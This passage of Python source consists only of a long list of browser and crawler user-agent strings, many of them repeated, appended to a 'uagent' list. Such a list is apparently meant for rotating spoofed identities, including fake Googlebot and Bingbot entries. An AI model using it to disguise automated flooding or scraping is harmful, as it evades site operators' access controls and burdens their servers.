uagent.append('Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)')
uagent.append('Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)')
uagent.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8')
uagent.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7')
uagent.append('Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)')
uagent.append('Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)')
uagent.append('YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)')
uagent.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
uagent.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
uagent.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
uagent.append('AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)')
uagent.append('Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)')
uagent.append('Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)')
uagent.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
uagent.append('Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15')
uagent.append('Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57')
uagent.append('Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
uagent.append('Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0')
uagent.append('Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g')
uagent.append('Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)')
uagent.append('Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125')
uagent.append('Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)')
uagent.append('Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)')
uagent.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
uagent.append('Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)')
uagent.append('Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)')
uagent.append('Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10')
uagent.append('Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0')
uagent.append('Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10')
uagent.append('Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)')
uagent.append('Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)')
uagent.append('Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)')
uagent.append('Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/uagent)')
uagent.append('Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16')
uagent.append('Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
uagent.append('Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)')
uagent.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
uagent.append('Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)')
uagent.append('Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7')
uagent.append('BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0')
uagent.append('Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)')
uagent.append('Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)')
uagent.append('Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)')
uagent.append('Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)')
uagent.append('Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007')
uagent.append('BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179')
uagent.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
uagent.append('Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15')
uagent.append('Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57')
uagent.append('Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
uagent.append('Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0')
uagent.append('Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g')
uagent.append('Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)')
uagent.append('Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125')
uagent.append('Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)')
uagent.append('Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)')
uagent.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
uagent.append('Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)')
uagent.append('Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)')
uagent.append('Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10')
uagent.append('Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0')
uagent.append('Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10')
uagent.append('Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)')
uagent.append('Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)')
uagent.append('Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)')
uagent.append('Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/uagent)')
uagent.append('Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16')
uagent.append('Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
uagent.append('Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)')
uagent.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
uagent.append('Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)')
uagent.append('Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7')
uagent.append('BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0')
uagent.append('Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)')
uagent.append('Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)')
uagent.append('Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)')
uagent.append('Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)')
uagent.append('Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007')
uagent.append('BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179')
uagent.append('Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620')
uagent.append('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com')
uagent.append('Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)')
uagent.append('Mozilla/4.0 (compatible; Arachmo)')
uagent.append('Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)')
uagent.append('Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)')
uagent.append('Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)')
uagent.append('Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)')
uagent.append('BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)')
uagent.append('Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)')
uagent.append('Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)')
uagent.append('Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/uagent)')
uagent.append('Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)')
uagent.append('Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )')
uagent.append('Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )')
uagent.append('Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)')
uagent.append('Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)')
uagent.append('Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)')
uagent.append('Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)')
uagent.append('Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)')
uagent.append('Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1')
uagent.append('Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)')
uagent.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A')
uagent.append('Mozilla/5.0 (PLAYSTATION 3; 3.55)')
uagent.append('Mozilla/5.0 (PLAYSTATION 3; 2.00)')
uagent.append('Mozilla/5.0 (PLAYSTATION 3; 1.00)')
uagent.append('Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0')
uagent.append('Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)')
uagent.append('SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)')
uagent.append('iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)')
uagent.append('iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)')
uagent.append('Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ')
uagent.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))')
uagent.append('Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)')
uagent.append('Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8')
uagent.append('Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)')
uagent.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
uagent.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
uagent.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
uagent.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
uagent.append('Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15')
uagent.append('Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57')
uagent.append('Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
uagent.append('Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0')
uagent.append('Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g')
uagent.append('Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)')
uagent.append('Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125')
uagent.append('Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)')
uagent.append('Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)')
uagent.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
uagent.append('Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)')
uagent.append('Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)')
uagent.append('Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10')
uagent.append('Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4')
